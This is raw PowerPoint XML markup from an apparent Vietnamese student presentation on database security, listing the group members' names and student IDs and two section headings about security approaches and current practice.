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296" r:id="rId2"/>
    <p:sldId id="297" r:id="rId3"/>
    <p:sldId id="299" r:id="rId4"/>
    <p:sldId id="257" r:id="rId5"/>
    <p:sldId id="302" r:id="rId6"/>
    <p:sldId id="281" r:id="rId7"/>
    <p:sldId id="282" r:id="rId8"/>
    <p:sldId id="260" r:id="rId9"/>
    <p:sldId id="284" r:id="rId10"/>
    <p:sldId id="300" r:id="rId11"/>
    <p:sldId id="285" r:id="rId12"/>
    <p:sldId id="286" r:id="rId13"/>
    <p:sldId id="287" r:id="rId14"/>
    <p:sldId id="303" r:id="rId15"/>
    <p:sldId id="289" r:id="rId16"/>
    <p:sldId id="290" r:id="rId17"/>
    <p:sldId id="304" r:id="rId18"/>
    <p:sldId id="291" r:id="rId19"/>
    <p:sldId id="301" r:id="rId20"/>
    <p:sldId id="292" r:id="rId21"/>
    <p:sldId id="293" r:id="rId22"/>
    <p:sldId id="298" r:id="rId23"/>
    <p:sldId id="294" r:id="rId24"/>
    <p:sldId id="305" r:id="rId25"/>
    <p:sldId id="295" r:id="rId26"/>
  </p:sldIdLst>
  <p:sldSz cx="18288000" cy="10287000"/>
  <p:notesSz cx="6858000" cy="9144000"/>
  <p:embeddedFontLst>
    <p:embeddedFont>
      <p:font typeface="The Serif Hand Light" panose="020B0604020202020204" charset="0"/>
      <p:regular r:id="rId29"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
      <p:regular r:id="rId30"/>
      <p:bold r:id="rId31"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
      <p:regular r:id="rId32"/>
      <p:bold r:id="rId33"/>
      <p:italic r:id="rId34"/>
      <p:boldItalic r:id="rId35"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Malgun Gothic" panose="020B0503020000020004" pitchFamily="34" charset="-12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1860" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="57" d="100"/>
          <a:sy n="57" d="100"/>
        </p:scale>
        <p:origin x="690" y="4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4E30F-8CCE-40A0-9B49-BAA951C199E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BED09E8-BE68-4C56-93D0-110B6D36B89D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>Nguyễn Đức Mạnh – 21087261 (CĐ 29) </a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5D6AEBA8-AC38-4FA6-A9D3-07F52FE41B8E}" type="parTrans" cxnId="{962EEDB5-AA83-4015-A26E-281B7FBEAD44}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4886F452-66A0-4ECD-9C55-59895E4AC243}" type="sibTrans" cxnId="{962EEDB5-AA83-4015-A26E-281B7FBEAD44}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{55736DE6-C371-4470-854E-A67DDF381F0B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>Nguyễn Thành Phát – 21010471 (CĐ 6)</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{933FB717-00DB-4B0D-83B6-6684A1DA3663}" type="parTrans" cxnId="{835215C5-22DB-4F76-BCF8-55E22EE0AA32}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6BFB250B-43A1-4F41-8EE4-7C2179D71195}" type="sibTrans" cxnId="{835215C5-22DB-4F76-BCF8-55E22EE0AA32}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{AC9116E6-514E-4BA5-A4AF-732482BF5FBA}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0" err="1"/>
            <a:t>Châu</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t> </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" dirty="0" err="1"/>
            <a:t>Công</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t> </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" dirty="0" err="1"/>
            <a:t>Thoại</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t> – 21009641 (CĐ 6)</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F4117A1C-0248-4DDF-8FE9-F644AD67DA98}" type="parTrans" cxnId="{EB2C8C71-2D37-459B-BE44-31AFB7F18325}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1CA3E3E4-7ECA-44EA-BFB9-43F95EEED028}" type="sibTrans" cxnId="{EB2C8C71-2D37-459B-BE44-31AFB7F18325}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{056F79CA-5264-4C04-A6AD-4F15D1EDAF8A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>Trần Tuấn Khang – 21125481 (CĐ 29) </a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4747FDC8-058E-481F-9EE9-D5C133B1E626}" type="parTrans" cxnId="{82284C64-BA59-4935-88A4-C91606348F70}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D59F9DEE-7FD4-4B43-9F76-4B20DB658BAF}" type="sibTrans" cxnId="{82284C64-BA59-4935-88A4-C91606348F70}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{DD42CACE-406E-4D19-B5FF-D47BC9E7B487}" type="pres">
      <dgm:prSet presAssocID="{2614E30F-8CCE-40A0-9B49-BAA951C199EB}" presName="vert0" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:animOne val="branch"/>
          <dgm:animLvl val="lvl"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0A3E48B1-166F-4F13-9FAE-7251EA0E9074}" type="pres">
      <dgm:prSet presAssocID="{55736DE6-C371-4470-854E-A67DDF381F0B}" presName="thickLine" presStyleLbl="alignNode1" presStyleIdx="0" presStyleCnt="4"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{8B9E29D0-1EAA-4BD2-AC58-99240CD47743}" type="pres">
      <dgm:prSet presAssocID="{55736DE6-C371-4470-854E-A67DDF381F0B}" presName="horz1" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{E916BA58-2065-4246-9186-56DA38A33F34}" type="pres">
      <dgm:prSet presAssocID="{55736DE6-C371-4470-854E-A67DDF381F0B}" presName="tx1" presStyleLbl="revTx" presStyleIdx="0" presStyleCnt="4" custScaleY="98534"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A7E693E6-8F29-411A-AD17-9C6E6DD3C4C7}" type="pres">
      <dgm:prSet presAssocID="{55736DE6-C371-4470-854E-A67DDF381F0B}" presName="vert1" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{E57FF448-CC67-47A6-9ABA-0322CF3B19A2}" type="pres">
      <dgm:prSet presAssocID="{AC9116E6-514E-4BA5-A4AF-732482BF5FBA}" presName="thickLine" presStyleLbl="alignNode1" presStyleIdx="1" presStyleCnt="4"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{D59E3E86-B043-4EAD-BCAC-D46C081AABA4}" type="pres">
      <dgm:prSet presAssocID="{AC9116E6-514E-4BA5-A4AF-732482BF5FBA}" presName="horz1" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{D6CDA621-8A9E-4019-AB44-B4067E063C69}" type="pres">
      <dgm:prSet presAssocID="{AC9116E6-514E-4BA5-A4AF-732482BF5FBA}" presName="tx1" presStyleLbl="revTx" presStyleIdx="1" presStyleCnt="4"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{50A9A01C-514A-4772-B044-64F5A74875CC}" type="pres">
      <dgm:prSet presAssocID="{AC9116E6-514E-4BA5-A4AF-732482BF5FBA}" presName="vert1" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{A1F02AB9-6CB7-4BC6-94D4-0D94D0B1C4AB}" type="pres">
      <dgm:prSet presAssocID="{DBED09E8-BE68-4C56-93D0-110B6D36B89D}" presName="thickLine" presStyleLbl="alignNode1" presStyleIdx="2" presStyleCnt="4"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{CC5EE624-C39D-462A-983F-39AE8BFDEAAF}" type="pres">
      <dgm:prSet presAssocID="{DBED09E8-BE68-4C56-93D0-110B6D36B89D}" presName="horz1" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{F0481591-6893-4F34-BF1F-E375A2AE8B00}" type="pres">
      <dgm:prSet presAssocID="{DBED09E8-BE68-4C56-93D0-110B6D36B89D}" presName="tx1" presStyleLbl="revTx" presStyleIdx="2" presStyleCnt="4"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{26BAF82A-8413-4FD9-ABCF-C3DC7C3D42A7}" type="pres">
      <dgm:prSet presAssocID="{DBED09E8-BE68-4C56-93D0-110B6D36B89D}" presName="vert1" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{57783180-DF65-447D-A23B-4BB36CBFE36E}" type="pres">
      <dgm:prSet presAssocID="{056F79CA-5264-4C04-A6AD-4F15D1EDAF8A}" presName="thickLine" presStyleLbl="alignNode1" presStyleIdx="3" presStyleCnt="4"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{4B9D7F55-332A-4631-8DA6-39AE596FD33A}" type="pres">
      <dgm:prSet presAssocID="{056F79CA-5264-4C04-A6AD-4F15D1EDAF8A}" presName="horz1" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{2E0B5F0C-AB96-4649-9660-6985F76B727C}" type="pres">
      <dgm:prSet presAssocID="{056F79CA-5264-4C04-A6AD-4F15D1EDAF8A}" presName="tx1" presStyleLbl="revTx" presStyleIdx="3" presStyleCnt="4"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{36CE5A29-1D8A-47FC-9E50-25E65BF54C71}" type="pres">
      <dgm:prSet presAssocID="{056F79CA-5264-4C04-A6AD-4F15D1EDAF8A}" presName="vert1" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{2BF88C69-847D-4FE3-993E-783493402FF8}" type="presOf" srcId="{55736DE6-C371-4470-854E-A67DDF381F0B}" destId="{E916BA58-2065-4246-9186-56DA38A33F34}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{68A1064E-1A9C-43E3-9699-2A09252A6DEF}" type="presOf" srcId="{2614E30F-8CCE-40A0-9B49-BAA951C199EB}" destId="{DD42CACE-406E-4D19-B5FF-D47BC9E7B487}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{7161C7C2-DE96-42FD-8ACD-9A0D74DD47DA}" type="presOf" srcId="{056F79CA-5264-4C04-A6AD-4F15D1EDAF8A}" destId="{2E0B5F0C-AB96-4649-9660-6985F76B727C}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{82284C64-BA59-4935-88A4-C91606348F70}" srcId="{2614E30F-8CCE-40A0-9B49-BAA951C199EB}" destId="{056F79CA-5264-4C04-A6AD-4F15D1EDAF8A}" srcOrd="3" destOrd="0" parTransId="{4747FDC8-058E-481F-9EE9-D5C133B1E626}" sibTransId="{D59F9DEE-7FD4-4B43-9F76-4B20DB658BAF}"/>
    <dgm:cxn modelId="{EB2C8C71-2D37-459B-BE44-31AFB7F18325}" srcId="{2614E30F-8CCE-40A0-9B49-BAA951C199EB}" destId="{AC9116E6-514E-4BA5-A4AF-732482BF5FBA}" srcOrd="1" destOrd="0" parTransId="{F4117A1C-0248-4DDF-8FE9-F644AD67DA98}" sibTransId="{1CA3E3E4-7ECA-44EA-BFB9-43F95EEED028}"/>
    <dgm:cxn modelId="{962EEDB5-AA83-4015-A26E-281B7FBEAD44}" srcId="{2614E30F-8CCE-40A0-9B49-BAA951C199EB}" destId="{DBED09E8-BE68-4C56-93D0-110B6D36B89D}" srcOrd="2" destOrd="0" parTransId="{5D6AEBA8-AC38-4FA6-A9D3-07F52FE41B8E}" sibTransId="{4886F452-66A0-4ECD-9C55-59895E4AC243}"/>
    <dgm:cxn modelId="{6E4AA122-D93E-490B-B8A0-07DF85C3AA56}" type="presOf" srcId="{DBED09E8-BE68-4C56-93D0-110B6D36B89D}" destId="{F0481591-6893-4F34-BF1F-E375A2AE8B00}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{835215C5-22DB-4F76-BCF8-55E22EE0AA32}" srcId="{2614E30F-8CCE-40A0-9B49-BAA951C199EB}" destId="{55736DE6-C371-4470-854E-A67DDF381F0B}" srcOrd="0" destOrd="0" parTransId="{933FB717-00DB-4B0D-83B6-6684A1DA3663}" sibTransId="{6BFB250B-43A1-4F41-8EE4-7C2179D71195}"/>
    <dgm:cxn modelId="{644B2CF3-D63C-4EC8-AA7F-4E517664BFEC}" type="presOf" srcId="{AC9116E6-514E-4BA5-A4AF-732482BF5FBA}" destId="{D6CDA621-8A9E-4019-AB44-B4067E063C69}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{2425B558-84FB-4897-A8EE-A2819115DB10}" type="presParOf" srcId="{DD42CACE-406E-4D19-B5FF-D47BC9E7B487}" destId="{0A3E48B1-166F-4F13-9FAE-7251EA0E9074}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{681FCF8C-7309-4767-A4B5-C3EF6EFD4299}" type="presParOf" srcId="{DD42CACE-406E-4D19-B5FF-D47BC9E7B487}" destId="{8B9E29D0-1EAA-4BD2-AC58-99240CD47743}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{ACDD2B7C-8971-441E-9BEB-51123778A136}" type="presParOf" srcId="{8B9E29D0-1EAA-4BD2-AC58-99240CD47743}" destId="{E916BA58-2065-4246-9186-56DA38A33F34}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{A0FA874F-C083-47B8-8BD5-0D984B635CF1}" type="presParOf" srcId="{8B9E29D0-1EAA-4BD2-AC58-99240CD47743}" destId="{A7E693E6-8F29-411A-AD17-9C6E6DD3C4C7}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{EA925C05-0FA8-4810-B541-E197C81BC8E2}" type="presParOf" srcId="{DD42CACE-406E-4D19-B5FF-D47BC9E7B487}" destId="{E57FF448-CC67-47A6-9ABA-0322CF3B19A2}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{8AF0A10E-24A4-4F34-B385-EF6E99FE5CA5}" type="presParOf" srcId="{DD42CACE-406E-4D19-B5FF-D47BC9E7B487}" destId="{D59E3E86-B043-4EAD-BCAC-D46C081AABA4}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{39CBECB0-1713-4D27-B861-829548AA2DDA}" type="presParOf" srcId="{D59E3E86-B043-4EAD-BCAC-D46C081AABA4}" destId="{D6CDA621-8A9E-4019-AB44-B4067E063C69}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{E6CB0EC4-2298-422C-9D71-DA5AFC0AEBCD}" type="presParOf" srcId="{D59E3E86-B043-4EAD-BCAC-D46C081AABA4}" destId="{50A9A01C-514A-4772-B044-64F5A74875CC}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{88974247-C4A0-4503-AA17-77F7C0C8954F}" type="presParOf" srcId="{DD42CACE-406E-4D19-B5FF-D47BC9E7B487}" destId="{A1F02AB9-6CB7-4BC6-94D4-0D94D0B1C4AB}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{DDC18C45-66FE-4DFE-972C-81AA7487C6FD}" type="presParOf" srcId="{DD42CACE-406E-4D19-B5FF-D47BC9E7B487}" destId="{CC5EE624-C39D-462A-983F-39AE8BFDEAAF}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{7CFD6CFB-4E8C-48D5-B8A2-475DCA38ADB7}" type="presParOf" srcId="{CC5EE624-C39D-462A-983F-39AE8BFDEAAF}" destId="{F0481591-6893-4F34-BF1F-E375A2AE8B00}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{CC7EE5E6-325B-4531-A3DE-03C819913B7F}" type="presParOf" srcId="{CC5EE624-C39D-462A-983F-39AE8BFDEAAF}" destId="{26BAF82A-8413-4FD9-ABCF-C3DC7C3D42A7}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{1CDF29CA-F79C-4543-BA12-96672AB30D86}" type="presParOf" srcId="{DD42CACE-406E-4D19-B5FF-D47BC9E7B487}" destId="{57783180-DF65-447D-A23B-4BB36CBFE36E}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{6A221AD9-CCF6-4567-B07E-AAA03AE35945}" type="presParOf" srcId="{DD42CACE-406E-4D19-B5FF-D47BC9E7B487}" destId="{4B9D7F55-332A-4631-8DA6-39AE596FD33A}" srcOrd="7" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{C8EB88D6-75BC-4A9C-92B0-874AF122549D}" type="presParOf" srcId="{4B9D7F55-332A-4631-8DA6-39AE596FD33A}" destId="{2E0B5F0C-AB96-4649-9660-6985F76B727C}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{ACF87EC2-68E2-4832-92B1-FDDB0BCB26CB}" type="presParOf" srcId="{4B9D7F55-332A-4631-8DA6-39AE596FD33A}" destId="{36CE5A29-1D8A-47FC-9E50-25E65BF54C7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27805-2569-4784-ADB2-6744768105CE}" type="doc">
      <dgm:prSet loTypeId="urn:microsoft.com/office/officeart/2005/8/layout/hChevron3" loCatId="process" qsTypeId="urn:microsoft.com/office/officeart/2005/8/quickstyle/simple3" qsCatId="simple" csTypeId="urn:microsoft.com/office/officeart/2005/8/colors/accent1_2" csCatId="accent1" phldr="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4347E25B-3010-47DC-8A73-1E358D04D937}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" b="1" u="none" spc="-84">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:rPr>
            <a:t>I. Giới thiệu về cách tiếp cận bảo mật cơ sở dữ liệu</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1CA11608-4280-438C-A212-41A321B96BF2}" type="parTrans" cxnId="{A558A8D0-687B-4857-8395-7FFE9ED4E30B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A36E3A79-C08C-4E9B-B757-0F4CF4C4DB66}" type="sibTrans" cxnId="{A558A8D0-687B-4857-8395-7FFE9ED4E30B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CA4E65E9-F2DD-40F2-9496-09415337C33C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" b="1" u="none" spc="-84">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:rPr>
            <a:t>II. Tìm hiểu về thực trạng và các công việc liên quan đến bảo mật hiện nay</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{21818679-359A-455E-835B-7FAE5F5C8EB9}" type="parTrans" cxnId="{1C63CFE5-00E3-4985-8041-01BD21636B20}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5D42A236-48DF-410F-A5C1-94C5E8C229EC}" type="sibTrans" cxnId="{1C63CFE5-00E3-4985-8041-01BD21636B20}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D19EAC91-1660-4C9B-B7A3-49F573B830C6}" type="pres">
      <dgm:prSet presAssocID="{47127805-2569-4784-ADB2-6744768105CE}" presName="Name0" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{93113567-E371-44D6-BF64-DB1B90FF0D27}" type="pres">
      <dgm:prSet presAssocID="{4347E25B-3010-47DC-8A73-1E358D04D937}" presName="parTxOnly" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="2" custScaleX="79002" custLinFactNeighborX="-2050" custLinFactNeighborY="3377">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{21C785DF-2620-4FCB-A6D1-3BA8D0B95F4A}" type="pres">
      <dgm:prSet presAssocID="{A36E3A79-C08C-4E9B-B757-0F4CF4C4DB66}" presName="parSpace" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{7B63D1D8-B6B1-44D2-BC18-3C6CA446E959}" type="pres">
      <dgm:prSet presAssocID="{CA4E65E9-F2DD-40F2-9496-09415337C33C}" presName="parTxOnly" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="2" custLinFactNeighborX="162" custLinFactNeighborY="129">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{AE6F0861-D46B-43D1-942A-E0758A65A1BA}" type="presOf" srcId="{47127805-2569-4784-ADB2-6744768105CE}" destId="{D19EAC91-1660-4C9B-B7A3-49F573B830C6}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hChevron3"/>
    <dgm:cxn modelId="{58D04965-CF81-4057-B1DE-69409E82046B}" type="presOf" srcId="{CA4E65E9-F2DD-40F2-9496-09415337C33C}" destId="{7B63D1D8-B6B1-44D2-BC18-3C6CA446E959}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hChevron3"/>
    <dgm:cxn modelId="{44AF7B72-7DCB-44FB-8C20-EE10F9689A63}" type="presOf" srcId="{4347E25B-3010-47DC-8A73-1E358D04D937}" destId="{93113567-E371-44D6-BF64-DB1B90FF0D27}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hChevron3"/>
    <dgm:cxn modelId="{1C63CFE5-00E3-4985-8041-01BD21636B20}" srcId="{47127805-2569-4784-ADB2-6744768105CE}" destId="{CA4E65E9-F2DD-40F2-9496-09415337C33C}" srcOrd="1" destOrd="0" parTransId="{21818679-359A-455E-835B-7FAE5F5C8EB9}" sibTransId="{5D42A236-48DF-410F-A5C1-94C5E8C229EC}"/>
    <dgm:cxn modelId="{A558A8D0-687B-4857-8395-7FFE9ED4E30B}" srcId="{47127805-2569-4784-ADB2-6744768105CE}" destId="{4347E25B-3010-47DC-8A73-1E358D04D937}" srcOrd="0" destOrd="0" parTransId="{1CA11608-4280-438C-A212-41A321B96BF2}" sibTransId="{A36E3A79-C08C-4E9B-B757-0F4CF4C4DB66}"/>
    <dgm:cxn modelId="{E0961644-C630-4709-80A5-2AEC460E5078}" type="presParOf" srcId="{D19EAC91-1660-4C9B-B7A3-49F573B830C6}" destId="{93113567-E371-44D6-BF64-DB1B90FF0D27}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hChevron3"/>
